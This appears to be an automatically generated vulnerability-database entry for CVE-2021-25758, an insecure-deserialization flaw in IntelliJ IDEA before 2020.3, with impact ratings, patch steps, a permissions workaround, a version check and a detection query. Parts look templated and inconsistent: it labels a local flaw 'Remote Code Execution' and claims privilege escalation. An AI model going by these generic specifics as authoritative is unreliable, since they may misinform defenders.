Login Sign Up

CVE-2021-25758

7.8 HIGH
Remote Code Execution Deserialization

📋 TL;DR

This vulnerability in JetBrains IntelliJ IDEA allows local code execution through insecure deserialization of workspace models. Attackers could exploit this to run arbitrary code on systems running vulnerable versions. Only users of IntelliJ IDEA before version 2020.3 are affected.

💻 Affected Systems

Products:
  • JetBrains IntelliJ IDEA
Versions: All versions before 2020.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of affected versions are vulnerable by default. No special configuration required for exploitation.

📦 What is this software?

Intellij Idea by Jetbrains

View all CVEs affecting Intellij Idea →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining full control of the local machine, potentially leading to data theft, lateral movement, or persistence establishment.

🟠

Likely Case

Local privilege escalation or arbitrary code execution within the user context, allowing access to sensitive files and development environments.

🟢

If Mitigated

Limited impact with proper network segmentation and user privilege restrictions, though local exploitation remains possible.

🌐 Internet-Facing: LOW - This is a local vulnerability requiring access to the affected system.
🏢 Internal Only: HIGH - Local attackers or malware could exploit this to escalate privileges or execute arbitrary code on developer workstations.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires local access to the system. The vulnerability involves deserialization attacks which are well-understood attack vectors.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2020.3 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020/

Restart Required: Yes

Instructions:

1. Open IntelliJ IDEA. 2. Go to Help > Check for Updates. 3. Install version 2020.3 or later. 4. Restart IntelliJ IDEA after installation completes.

🔧 Temporary Workarounds

Restrict workspace file access

all

Limit access to workspace files to prevent malicious deserialization

chmod 600 workspace.xml
Set file permissions to read/write only for owner

🧯 If You Can't Patch

  • Restrict user privileges to minimize impact of potential code execution
  • Implement application whitelisting to prevent execution of unauthorized binaries

🔍 How to Verify

Check if Vulnerable:

Check IntelliJ IDEA version in Help > About. If version is earlier than 2020.3, system is vulnerable.

Check Version:

On Linux/macOS: grep -i 'version' ~/.IntelliJIdea*/config/options/ide.general.xml | head -1

Verify Fix Applied:

Verify version is 2020.3 or later in Help > About. Test workspace loading functionality remains operational.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process spawning from IntelliJ IDEA
  • Errors in workspace deserialization logs
  • Suspicious file access patterns

Network Indicators:

  • Outbound connections from IntelliJ IDEA to unexpected destinations

SIEM Query:

process_name:"idea" AND (process_spawned:true OR file_access:"workspace.xml")

📊 Metadata

CVE ID: CVE-2021-25758
CVSS v3 Score: 7.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-502
Published: February 3, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-25758, you might also want to check these:

CVE-2023-46604 10.0

CVE-2023-46604 is a critical remote code execution vulnerability in Apache ActiveMQ's Java OpenWire ...

Same vulnerability type (CWE-502)
CVE-2023-49772 10.0

This vulnerability allows unauthenticated attackers to execute arbitrary PHP code through deserializ...

Same vulnerability type (CWE-502)
CVE-2024-25100 10.0

This vulnerability allows unauthenticated attackers to inject malicious PHP objects via deserializat...

Same vulnerability type (CWE-502)